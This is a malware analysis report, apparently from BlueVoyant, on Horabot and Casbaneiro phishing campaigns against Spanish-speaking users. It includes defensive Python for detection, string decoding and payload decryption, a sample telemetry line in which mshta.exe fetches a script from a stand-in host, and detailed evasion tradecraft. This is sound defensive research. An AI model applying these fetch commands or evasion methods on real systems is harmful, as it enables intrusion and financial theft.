Unpacking Augmented Marauder’s Multi-Pronged Casbaneiro Campaigns

March 31, 2026 | 13 min read

Thomas Elkins and Joshua Green

What Happened? 

BlueVoyant researchers have uncovered a broad, multi-pronged phishing campaign targeting Spanish-speaking users in organizations across Latin America and now Europe as well. While recent industry intelligence heavily documented attacks utilizing WhatsApp to deliver banking trojans under the umbrella of the Brazil-based eCrime group Augmented Marauder (a.k.a. Water Saci), the BlueVoyant Threat Fusion Cell (TFC) identified concurrent, ongoing attack activity showing this threat group employs a wider-ranging attack model focused on a bespoke delivery and propagation mechanism that includes WhatsApp, ClickFix techniques and email-centric phishing. This in-depth analysis shows how Augmented Marauder is simultaneously deploying Horabot to deliver the Casbaneiro (a.k.a. Metamorfo) banking trojan through a comprehensive phishing operation targeting Latin America that has also extended its attacks to users in Spain. 

The Initial Attack 

BlueVoyant researchers observed multiple users receiving phishing emails with the subject line "Citación judicial pendiente – actuación obligatoria comparecencia el No. 20260226-124145" (Pending judicial summons – mandatory appearance). The email contained a password-protected PDF attachment designed to mimic an official Spanish judicial notification, informing recipients they were legally required to appear as witnesses in court and directing them to click an embedded link to access their case file. The subject line and document content are deliberate scare tactics, invoking fear of legal consequences to pressure users into interacting with the email without scrutiny. 

Figure 1

The use of a password-protected attachment serves a dual purpose: it prevents email security gateways from scanning the PDF contents, and it creates a false sense of document legitimacy — implying the attachment contains sensitive legal material warranting protection.

Figure 2 pdf

Upon interacting with the embedded link, the victim's default browser is launched and directed to the attacker-controlled URL. BlueVoyant researchers observed that the landing page initiates a file download automatically, without further user interaction. Unlike previous iterations of this malware that relied on statically named archives, this variant introduces a dynamic evasion upgrade: the downloaded ZIP archive's filename consists of a dynamically generated Version 4 UUID combined with a variable trailing string, both of which change with each download instance. Because the HTA inside the archive carries the same per-download name, no two downloads produce a byte-identical archive. This server-side generation of unique filename tokens is designed to defeat hash- and filename-based detection and, at the same time, lets the operators track individual victim click-throughs.

Contained within the ZIP archive was an HTA file named with the same UUID-based convention observed on the archive. The HTA file contained a script tag whose src attribute referenced an external URL, so if the victim opened the file, the Windows process mshta.exe would spawn and attempt to retrieve and execute code hosted at hxxps://ge.factu.it[.]com/GZSPEGIJ/YFSBNPQK. Consistent with previous Horabot campaigns documented by Fortinet and Kaspersky, the HTA file uses junk HTML padding to evade static signatures and calls the JavaScript moveTo() function to reposition the mshta window off-screen, hiding the activity from the user. Pivoting on this infrastructure shows the campaign phase has been ongoing since September 2025, with a noticeable lull over December and January.

Figure 3 hta file

VBS Payloads

After executing the HTA file in a controlled environment, BlueVoyant researchers captured the resulting network traffic, which revealed a two-stage loading chain originating from the HTA file. The initial GET request to hxxps://104.21.19[.]50/GZSPEGIJ/YFSBNPQK returned a small JavaScript payload, served through Cloudflare, that dynamically injected a second script element of type VBScript into the document, pointing to hxxps://ge.factu.it[.]com/g1/ld1/. The second stage returned a gzip-compressed VBScript containing an obfuscated string decryption routine.
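The delivery chain described above (a UUID-named ZIP and HTA, then mshta.exe fetching a remote script) is the sequence a detection engineer would hunt for in process and file telemetry. The script below is an added example written for this article, not BlueVoyant tooling, and it runs two checks over a handful of constructed Sysmon-style events: a Version 4 UUID filename check on files written to disk, and an mshta.exe launch check for either a remote URL or a UUID-named HTA argument. All paths, the user name and the staging host (stage.example) are placeholders, not indicators from the real campaign.

```python
"""Triage of process/file telemetry for the delivery chain described above.
Added example for this article; the events below are constructed, not real telemetry."""
import re

# Version 4 UUID: version nibble "4" in the third group, variant nibble 8/9/a/b in the fourth.
UUID4 = r"[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}"
# <uuid4><optional trailing token>.zip or .hta, the naming convention seen on the archive and HTA.
UUID_NAMED = re.compile(rf"^{UUID4}[-_a-z0-9]*\.(?:zip|hta)$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
HTA_ARG = re.compile(r'"?([^"\s]+\.hta)"?', re.IGNORECASE)


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1]


def is_uuid4_named(path: str) -> bool:
    """True for names like 3f2a9c1e-7b44-4d8e-9a10-5c6d7e8f9a0b-q7x.zip (any trailing token)."""
    return bool(UUID_NAMED.match(basename(path)))


def triage(events):
    """Return [(index, reason)] for events matching the chain. Two signals:
    a uuid4-named archive/HTA written to disk, and mshta.exe launched either with a
    remote URL or with a uuid4-named HTA as its argument."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "file":
            if is_uuid4_named(ev["target"]):
                hits.append((i, "uuid4-named ZIP/HTA written by " + basename(ev["image"])))
        elif ev["type"] == "process" and basename(ev["image"]).lower() == "mshta.exe":
            cmd = ev["cmdline"]
            if REMOTE_URL.search(cmd):
                hits.append((i, "mshta.exe launched with a remote URL"))
            else:
                m = HTA_ARG.search(cmd)
                if m and is_uuid4_named(m.group(1)):
                    hits.append((i, "mshta.exe executing a uuid4-named HTA"))
    return hits


# Constructed sample telemetry (Sysmon-style), not events from a real host.
UUID_TOKEN = "3f2a9c1e-7b44-4d8e-9a10-5c6d7e8f9a0b-q7x"
SAMPLE_EVENTS = [
    {"type": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": rf"C:\Users\ana\Downloads\{UUID_TOKEN}.zip"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": rf'"C:\Windows\System32\mshta.exe" "C:\Users\ana\Downloads\{UUID_TOKEN}\{UUID_TOKEN}.hta"'},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # benign: local, static name
    {"type": "process", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": "mshta.exe https://stage.example/GZSPEGIJ/YFSBNPQK"},  # placeholder host
]

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {why}")
```

The UUID check is deliberately strict about the version and variant nibbles so that ordinary GUID-named installers and update packages (which are rarely random v4 values in a Downloads folder) do not all trip it; in production the mshta.exe rule would additionally be scoped to user-writable parent directories.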

Figure 4 vbs

Embedded within the final VBS script was a custom string decryption function designed to conceal malicious content from static analysis tools. Rather than storing strings in plaintext, each encoded string is passed into the function at runtime and decrypted in memory. In one sample, BlueVoyant researchers observed that the routine works by extracting the first character of the encoded string, which serves as a dynamic per-string key: 65 is subtracted from its ASCII value and a hardcoded constant of 573 is added. The remaining characters are then consumed in pairs, where each pair represents a base-25 encoded value using an A=0 alphabet. The decryption key is subtracted from each decoded pair value, and the result is converted back into a readable character.
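The routine just described is simple enough to reimplement, which is how an analyst would bulk-decode the strings without stepping through the VBScript. The following is an added example for this article, not the sample's own code. Two details the page does not state are assumed: within each pair the first character is the more significant base-25 digit, and a digit is simply the character's ASCII value minus 65, so characters past 'Y' act as high digits. The encoder is our own inverse, included only to build test vectors.

```python
"""Reconstruction of the per-string decryption routine described above.
Added example for this article, not the sample's VBScript.
Assumptions (not stated on the page): digit pairs are most-significant first, and a
digit is ord(char) - 65, so characters beyond 'Y' are legal high digits."""

BASE = 25          # radix of each two-character group
ALPHA_ZERO = 65    # ord('A'); the "A=0" alphabet
KEY_CONST = 573    # hardcoded constant added to the per-string key


def string_key(first_char: str) -> int:
    """Per-string key: (ASCII of the first character - 65) + 573."""
    return (ord(first_char) - ALPHA_ZERO) + KEY_CONST


def decode_string(encoded: str) -> str:
    """Decrypt one string: first char is the key, the rest are base-25 digit pairs."""
    if len(encoded) < 3 or (len(encoded) - 1) % 2:
        raise ValueError("encoded string must be a key character plus whole digit pairs")
    key = string_key(encoded[0])
    out = []
    for i in range(1, len(encoded), 2):
        hi = ord(encoded[i]) - ALPHA_ZERO
        lo = ord(encoded[i + 1]) - ALPHA_ZERO
        value = hi * BASE + lo
        out.append(chr(value - key))  # ValueError if value < key (corrupt/garbage input)
    return "".join(out)


def encode_string(plain: str, key_char: str = "A") -> str:
    """Inverse routine (our reconstruction, used to build test vectors): emits the key
    character followed by one base-25 pair per plaintext character."""
    key = string_key(key_char)
    pairs = []
    for ch in plain:
        value = ord(ch) + key
        pairs.append(chr(ALPHA_ZERO + value // BASE) + chr(ALPHA_ZERO + value % BASE))
    return key_char + "".join(pairs)


def decode_all(encoded_strings):
    """Decrypt a batch of strings pulled from a sample, keeping undecodable ones visible."""
    results = {}
    for s in encoded_strings:
        try:
            results[s] = decode_string(s)
        except (ValueError, IndexError) as exc:
            results[s] = f"<undecodable: {exc}>"
    return results


if __name__ == "__main__":
    # Constructed inputs, not strings lifted from the real sample.
    sample = ["K[K[Q[F[RZX", encode_string("C:\\Users\\Public\\id", "Q")]
    for enc, dec in decode_all(sample).items():
        print(f"{enc!r} -> {dec!r}")
```

Note what the constant buys the author: because the key is 573 plus a small per-string offset, every pair value sits in the 600 to 725 range and the leading digit of a pair is almost always 'Y' through ']', so the same plaintext encoded under two different key characters shares no substrings, which defeats naive string-based YARA rules.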

Figure 5 vbs

Prior to execution, the VBS payload performs environment and anti-analysis checks identical to those detailed in Fortinet's prior Horabot analysis, including checking for Avast directories and querying WMI for virtual machine artifacts. If any check trips, the script terminates mshta.exe and exits.

However, BlueVoyant researchers noted an expansion of the hardcoded username blocklist. While previous campaigns only checked for the legacy sandbox user JOHN-PC, this newer variant actively searches for IT-Admin, WALKER, and TIM-XG178L01X6. This addition indicates the threat operators are actively gathering intelligence on modern sandboxing environments and refining their anti-analysis capabilities.

During this initial staging phase, BlueVoyant researchers identified artifacts suggesting the malware utilizes, or attempts to utilize, privilege impersonation techniques. Specifically, embedded URLs extracted from the attack chain carried the appended string Security=Impersonation. While this string resembles the syntax used to request impersonation levels on WMI or COM objects (e.g., impersonationLevel=impersonate), its presence within a network request indicates it may instead serve as a C2 signaling flag to confirm elevated execution, a request for a specific permission-dependent payload, or simply an artifact of script concatenation errors during runtime deobfuscation.

Figure 6 known virtual machines

If the environment checks pass, the VBS script establishes a working directory at C:\Users\Public\LAPTOP-0QF0NEUP32 (a slight iteration on previously reported directory naming conventions) and downloads files from the attacker-controlled server at hxxps://ge.factu.it[.]com/g1/.

Figure 7 files

Among these downloaded files are Turo.exe (a renamed AutoIT interpreter) and Tekojac.exe (a renamed Aut2Exe compiler utility). To compile the payload and establish persistence, the malware employs the exact file attribute manipulation and Windows Startup folder shortcut (.LNK) techniques detailed in Fortinet's prior reporting. This includes purging pre-existing executables in the Startup and AppData directories, compiling standalone AutoIT outputs (newly named Obicaf.ai and Jiveve.ai), and dropping a timestamp file at C:\Users\Public\id.

AutoIT Script Analysis

Because the AutoIT scripts were downloaded in their uncompiled form prior to execution, they were easier to analyze and review. BlueVoyant researchers determined that each script acted as a loader, responsible for locating encrypted payload files with .ia or .at extensions (examples: Darutu.ia and Behurec.at), opening the files in binary mode and reading the contents directly into memory for further processing. These files serve as encrypted containers that store the next stage of the malware payload.

Figure 8 auto it

Analysis of these AutoIT scripts confirms the threat actor is still relying on the same cryptographic mechanisms previously observed and outlined by Kaspersky, Fortinet, and Cisco Talos. The scripts use the Windows CryptoAPI to decrypt the payloads with AES, keyed from the known hardcoded seed 99521487. The decrypted DLLs are then loaded reflectively from memory, never touching disk, and execution is passed to the widely documented export function B080723_N.
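Because the seed is a password handed to CryptoAPI rather than a raw key, an offline decryptor for the .ia/.at containers has to reproduce CryptDeriveKey() exactly. The following is an added example for this article, not the loader's AutoIT and not BlueVoyant tooling. It assumes what AutoIt's _Crypt_DecryptData() does by default: the seed goes through _Crypt_DeriveKey with an MD5 base hash, the cipher is AES-256 (so the 16-byte digest must be expanded to a 32-byte key using the documented 0x36/0x5C construction), and CryptDecrypt() runs with its defaults of CBC mode, an all-zero IV and PKCS#5 padding. The AES step needs the third-party cryptography package; the key derivation is pure standard library.

```python
"""Reproduces the CryptoAPI CryptDeriveKey() schedule behind AutoIt's _Crypt_DecryptData(),
so the AES key derived from the hardcoded seed can be reproduced in an offline decryptor.
Added example for this article. Assumptions: MD5 base hash (AutoIt default), AES-256,
and CryptDecrypt() defaults (CBC, zero IV, PKCS#5 padding)."""
import hashlib

SEED = b"99521487"  # hardcoded seed reported across Horabot/Casbaneiro AutoIT loaders


def crypt_derive_key(password: bytes, key_len: int = 32, hash_name: str = "md5") -> bytes:
    """CryptDeriveKey(): hash the password; if the digest is shorter than the requested key,
    expand it with the documented 0x36/0x5C construction and take the first key_len bytes."""
    digest = hashlib.new(hash_name, password).digest()
    if len(digest) >= key_len:
        return digest[:key_len]  # no expansion needed (e.g. SHA-256 for AES-256)
    # Two 64-byte buffers of 0x36 / 0x5C whose first len(digest) bytes are XORed with the digest.
    buf36 = bytes(b ^ 0x36 for b in digest) + b"\x36" * (64 - len(digest))
    buf5c = bytes(b ^ 0x5C for b in digest) + b"\x5C" * (64 - len(digest))
    expanded = hashlib.new(hash_name, buf36).digest() + hashlib.new(hash_name, buf5c).digest()
    return expanded[:key_len]


def decrypt_container(blob: bytes, key: bytes) -> bytes:
    """AES-CBC with a zero IV and PKCS#5 padding, i.e. CryptDecrypt() defaults.
    Needs the third-party 'cryptography' package; everything else here is stdlib."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    if len(blob) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    dec = Cipher(algorithms.AES(key), modes.CBC(b"\x00" * 16)).decryptor()
    padded = dec.update(blob) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#5 padding: wrong key, mode or IV")
    return padded[:-pad]


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on a decrypted .ia/.at container: the DLL should start with 'MZ'."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    key = crypt_derive_key(SEED)
    print("AES-256 key derived from seed:", key.hex())
    # Usage on a real container: looks_like_pe(decrypt_container(open("Darutu.ia", "rb").read(), key))
```

If the padding check fails on a real container, the first things to vary are the base hash (SHA-1 or SHA-256 if the loader passes a non-default hash ID to _Crypt_DeriveKey) and the key length (16 bytes for $CALG_AES_128), since those are the only knobs the AutoIt wrapper exposes.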

Using a debugger, BlueVoyant researchers placed a breakpoint on the CryptDecrypt function to obtain the decrypted payloads. Initial analysis indicated that the payloads represented two distinct but cooperative malware families: the Casbaneiro banking trojan (the primary payload) and Horabot (the delivery, evasion, and propagation botnet). The two payloads, staticdata.dll and at.dll, each serve a different purpose.

Casbaneiro Banking Trojan (staticdata.dll)

The larger file of the two, staticdata.dll, contained the core Casbaneiro malware, including its large strings table containing the names of popular Latin American and Spanish banks. Industry intelligence indicates the Brazil-based operators of Casbaneiro (a.k.a. Metamorfo) are the lone developers and users of this malware. Because Casbaneiro is an in-house tool and is not sold on underground forums as Malware-as-a-Service (MaaS), its presence allows BlueVoyant to assess with high confidence that this attack is attributable to a specific adversary, Augmented Marauder (a.k.a. Water Saci).

Further analysis of at least one staticdata.dll payload revealed underlying dependencies on OpenSSL for its cryptographic operations. Researchers extracted hardcoded strings embedded within the DLL referencing an OpenSSL support page directly concatenated with file paths, specifically hxxp://www[.]openssl[.]org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG. This string reflects standard OpenSSL behavior, the search for a .rnd seed file to initialize the pseudo-random number generator (PRNG) used for secure communications, and is most likely a static linking artifact rather than code the actors wrote. Its presence suggests the threat actors are statically linking older, legitimate OpenSSL or Delphi Indy communication libraries into their payloads rather than writing custom file-system search routines.

Figure 9 code

Once staticdata.dll connects to its hardcoded C2, the server responds with a series of encrypted strings, which the DLL decrypts and reads. These strings include additional network URLs used for subsequent communications.

Figure 10 strings output

One of these URLs delivered a PowerShell command that invoked six separate PowerShell scripts, each containing an Invoke-WebRequest call to retrieve and execute further scripts hosted on remote servers. During analysis, BlueVoyant researchers observed that only one of the six remote servers was responsive. The PowerShell script hosted there was designed to replicate the initial phishing attack by leveraging the compromised host to distribute malicious emails to harvested contacts.

The Horabot Spreader (Propagation Script)

The final stage utilizes a highly obfuscated PowerShell script representing the core of the Horabot propagation engine. This script functions identically to the Horabot spreader documented by Cisco Talos and Fortinet: it leverages Outlook COM objects and the MAPI namespace to scrape the victim’s contacts, filters them against a downloaded blocklist, and writes them to %APPDATA%\Microsoft\.Outlook.

Figure 11 code

However, BlueVoyant researchers uncovered a highly sophisticated, previously undocumented dynamic lure generation capability within this script. Rather than distributing a static file or hardcoded link as seen in older Horabot campaigns, this script initiates an HTTP POST request to a remote PHP API (hxxps://tt.grupobedfs[.]com/.../gera_pdf.php), passing a randomly generated four-digit PIN.

Figure 12 snippet

The server dynamically forges a bespoke, password-protected PDF impersonating a Spanish judicial summons, which is returned to the infected host. The script then iterates over the filtered email list, utilizing the compromised user's own email account to send a tailored phishing email with the newly generated PDF attached.

Figure 13 powershell

By generating a unique payload for each propagation wave, the attackers drastically reduce the likelihood of the outbound emails being fingerprinted and blocked by enterprise secure email gateways (SEGs).

Horabot Webmail Hijacker (at.dll)

The secondary payload, at.dll, serves as a spam and account hijacking tool targeting Yahoo, Live, and Gmail accounts, aligning broadly with Cisco Talos's previous reporting on Horabot's Delphi-based spam modules. However, deep-dive reverse engineering by BlueVoyant uncovered a novel, modular remote configuration mechanism within this DLL.

Figure 14 code

Upon connecting to its C2 server (hxxps://cgf.facturastbs[.]shop/a/08/150822/au), at.dll retrieves a set of encrypted command strings that are decrypted at runtime. The decrypted strings include the following:

  • AUTOON
  • hxxps://msedge.sf.dl.delivery.mp.microsoft[.]com/filestreamingservice/files/eb361492-f9f3-48ca-ac3a-217ce4e06798/MicrosoftEdgeWebView2RuntimeInstallerX86.exe
  • AUTOLISTAOFF
  • ENVPDFON
  • ENVGMTOGMOFF
  • ENVHTTOHTOFF
  • ENVIAPNGOFF
  • TESTERON
  • ENVIAFREEOFF
  • ENVIASMTPON

Figure 15 sample

These decrypted C2 strings appear to represent a remote configuration command set. They are compared against hardcoded reference values within the binary using an internal Delphi string comparison routine. If a match is found, a corresponding flag at a specific memory offset is flipped (set to 1), enabling that feature or behavior. This modular framework allows operators to adaptively configure the botnet to monitor and hijack webmail providers in real-time, without requiring any direct interaction with the compromised host or the deployment of new binaries.
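As an added example (not BlueVoyant's code and not the DLL's), the parser below turns a batch of decrypted C2 strings into a configuration view the way the binary does: every known feature starts cleared, each string is compared against a hardcoded reference list, and a match sets that feature. Two things the page does not state are assumed here: the feature name is the prefix before ON/OFF (so ENVIASMTPON is ENVIASMTP enabled), and URL entries name resources the bot is expected to fetch. Strings that match neither are surfaced rather than dropped, since a new command word is exactly what an analyst wants to notice in the next sample.

```python
"""Parser for the remote-configuration strings at.dll receives from its C2.
Added example for this article. Assumption: each toggle is <feature>ON or <feature>OFF,
and non-toggle entries beginning with a URL scheme are resources to fetch."""

# Feature names recovered from the strings above (assumed split: prefix + ON/OFF).
KNOWN_FEATURES = {
    "AUTO", "AUTOLISTA", "ENVPDF", "ENVGMTOGM", "ENVHTTOHT",
    "ENVIAPNG", "TESTER", "ENVIAFREE", "ENVIASMTP",
}

URL_SCHEMES = ("http://", "https://", "hxxp://", "hxxps://")  # accept defanged input too


def parse_config(decrypted_strings):
    """Return {'flags': {feature: bool}, 'urls': [...], 'unknown': [...]}.
    Mirrors the binary: all flags start at 0 and a string flips one only if it matches
    a hardcoded reference. Unrecognised strings are kept for the analyst."""
    cfg = {"flags": {name: False for name in KNOWN_FEATURES}, "urls": [], "unknown": []}
    for raw in decrypted_strings:
        s = raw.strip()
        if s.lower().startswith(URL_SCHEMES):
            cfg["urls"].append(s)
            continue
        if s.endswith("OFF"):
            name, enabled = s[:-3], False
        elif s.endswith("ON"):
            name, enabled = s[:-2], True
        else:
            cfg["unknown"].append(s)
            continue
        if name in KNOWN_FEATURES:
            cfg["flags"][name] = enabled
        else:
            cfg["unknown"].append(s)  # new command word: worth a look
    return cfg


def enabled_features(cfg):
    """Sorted list of feature names the C2 switched on in this configuration."""
    return sorted(name for name, on in cfg["flags"].items() if on)


# The decrypted strings listed in the report, in the order received.
SAMPLE_C2_STRINGS = [
    "AUTOON",
    "hxxps://msedge.sf.dl.delivery.mp.microsoft[.]com/filestreamingservice/files/"
    "eb361492-f9f3-48ca-ac3a-217ce4e06798/MicrosoftEdgeWebView2RuntimeInstallerX86.exe",
    "AUTOLISTAOFF", "ENVPDFON", "ENVGMTOGMOFF", "ENVHTTOHTOFF", "ENVIAPNGOFF",
    "TESTERON", "ENVIAFREEOFF", "ENVIASMTPON",
]

if __name__ == "__main__":
    parsed = parse_config(SAMPLE_C2_STRINGS)
    print("enabled:", enabled_features(parsed))
    print("fetch:", parsed["urls"])
    print("unknown:", parsed["unknown"])
```

Run against the strings above, the view is consistent with an email-borne propagation mode: the SMTP sender and PDF attachment paths are on while the PNG, free-mail and webmail-to-webmail paths are off, with a legitimate WebView2 runtime installer URL supplied alongside, presumably so the bot can stand up an embedded browser where one is missing.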

Linkage to Broader LATAM Ecosystem

BlueVoyant assesses with high confidence the Horabot attack activity detailed in this report is operationally linked to the cybercriminal Augmented Marauder (a.k.a. Water Saci) threat group’s Maverick (a.k.a. Sorvepotel) malware campaigns recently documented by BlueVoyant’s TFC as well as Trend Micro. The strongest technical bridge uniting these seemingly distinct toolsets is their shared reliance on the Casbaneiro (a.k.a. Metamorfo) AutoIT execution framework. Because Casbaneiro is widely viewed as an exclusive, proprietary tool operated solely by its Brazil-based developers, its presence in this infection chain serves as a high-confidence attribution anchor.

This report stands alongside recent and foundational Horabot research from Kaspersky, Fortinet, and Cisco Talos, which highlights the use of legitimate AutoIT interpreters to decrypt and reflectively load Delphi banking payloads. In December 2025, Trend Micro observed Augmented Marauder variants employing this exact same AutoIT delivery mechanism, shortly after the group was observed deploying Maverick .NET payloads in October 2025, activity BlueVoyant identified at the same time. This highly specific execution chain, coupled with identical cryptographic seeds observed across the various malware families, strongly suggests shared developer resources or tooling for this adversary.

Furthermore, both sets of attack chains exhibit an identical, highly aggressive propagation philosophy that relies heavily on "Living off the Land" (LotL) and fileless execution techniques. Rather than simply stealing credentials and going dormant, both campaigns utilize deeply nested, script-heavy infection chains—transitioning from initial HTA, LNK, or VBS files into obfuscated PowerShell—to turn infected hosts into self-propagating botnets. Whereas this Horabot attack stream weaponizes PowerShell to manipulate Outlook COM objects and the MAPI namespace, the October-described Maverick (a.k.a. Sorvepotel) campaign utilized functionally similar PowerShell and Python scripts to automate WhatsApp Web via Chrome debugging and Selenium. In both models, the core objective is to hijack a victim's active communication session to scrape contacts and distribute malicious payloads, thereby bypassing traditional security perimeters by leveraging trusted sender identities. 

Both frameworks also share rigorous anti-analysis routines, utilizing WMI and system queries to evade known antivirus directories, specific debuggers, and sandbox environments. Once resident in memory, both the Horabot and Maverick attack chains utilize continuous window-title monitoring to trigger sophisticated, fake credential overlays when victims navigate to specific Latin American and Iberian banking or cryptocurrency institutions.

Finally, this linkage is reinforced by the parallel targeting and social engineering tactics. Both campaign branches rely on nearly identical initial access lures, such as fake invoices, tax documents, or the judicial summons observed in this report, packed inside ZIP archives. Augmented Marauder's capacity for continuous evolution is further highlighted by their adoption of "ClickFix" tactics within the Horabot attack path. As recently documented by Kaspersky, the threat actors utilized fake CAPTCHA pages designed to trick victims into manually copying and executing malicious scripts via the Windows Run dialog.

Taken together, the integration of ClickFix social engineering, alongside dynamic PDF generation and WhatsApp automation, demonstrates an agile adversary that is continually innovating and executing diverse attack paths to bypass modern security controls. Ultimately, BlueVoyant assesses this adversary is maintaining a bifurcated, multi-pronged attack infrastructure, dynamically deploying the WhatsApp-centric Maverick chain and concurrently utilizing both ClickFix and email-based Horabot attack paths.

Conclusion

The discovery of this phishing campaign exposes a highly strategic, multi-pronged attack model employed by the Augmented Marauder (a.k.a. Water Saci) threat group. It is now evident that while these Brazil-based operators heavily leverage script-based WhatsApp automation to compromise retail and consumer users in Latin America, they concurrently maintain and deploy an advanced email-hijacking engine to penetrate enterprise perimeters in Latin America and Europe alike. Despite the divergence in initial access vectors, the underlying infection chain remains unified by the Casbaneiro AutoIT execution framework.

What makes this adversary particularly dangerous is its rapid pace of innovation. Its continued use of dynamic payloads, server-side PDF lure generation and programmatic UUID-based ZIP archives shows the attackers actively engineering methods to defeat hash-based detection and bypass modern secure email gateways (SEGs). Coupled with their recent integration of "ClickFix" social engineering tactics, their documented WhatsApp automated attack chain and the campaign's extension to Spanish-speaking users in Europe, Augmented Marauder has proven to be an agile threat group capable of continually evolving to overcome enterprise security controls.

MITRE ATT&CK Techniques

T1566 (Phishing)

T1566.001 (Spearphishing Attachment)

T1566.002 (Spearphishing Link)

T1534 (Internal Spearphishing)

T1657 (Financial Theft)

T1584 (Compromise Infrastructure)

T1204.001 (User Execution: Malicious Link) 

T1059.001 (PowerShell)

T1059.005 (Command and Scripting Interpreter: Visual Basic)

T1059.007 (Command and Scripting Interpreter: JavaScript)

T1027 (Obfuscated Files or Information)

T1140 (Deobfuscate/Decode Files)

T1055 (Process Injection)

T1497 (Virtualization/Sandbox Evasion)

T1218.005 (System Binary Proxy Execution: Mshta)

Indicators

hxxps://ge.factu.it[.]com/GZSPEGIJ/YFSBNPQK

hxxps://104.21.19[.]50/GZSPEGIJ/YFSBNPQK

hxxps://ge.factu.it[.]com/g1/ld1/

hxxps://ge.factu.it[.]com/g1/

hxxps://tt.grupobedfs[.]com/.../gera_pdf.php

hxxps://cgf.facturastbs[.]shop/a/08/150822/au

factu.it[.]com

grupobedfs[.]com

facturastbs[.]shop

239cb9232fe01c8b82eb627f66acc6848cb223dfea46d4923844c1fe20f1de49 - PDF Sample

3e4002c7f0909d3c743b3586098e248d413f485c6bb033cafdb322bd8b206ebb - PDF Sample

1af69a3283e28a8cc9a11819ecc2f2cff46dcabbfa78cefc71a02b881a064593 - HTA

69fc15919044fc6a94bb251afd90a0a07204b79df3bc62c49ba6b0febefbc33e - HTA

d1d08f7e44641d921fad22ed175b928c696befd14a55271eb203f8fcaff553d5 - ZIP

b56d00addd6c6a266de3c739dad22aa1de52624066544929754d47332257cba6 - ZIP

1693448804bf1c90ad7317af250bcd6ea021256e33e983b224aea81d4ecc2e20 - staticdata.dll

4e08a1525a62a387595a2e4942b56ec3f3b3259996115ea2e6ea3638ccb87705 - staticdata.dll
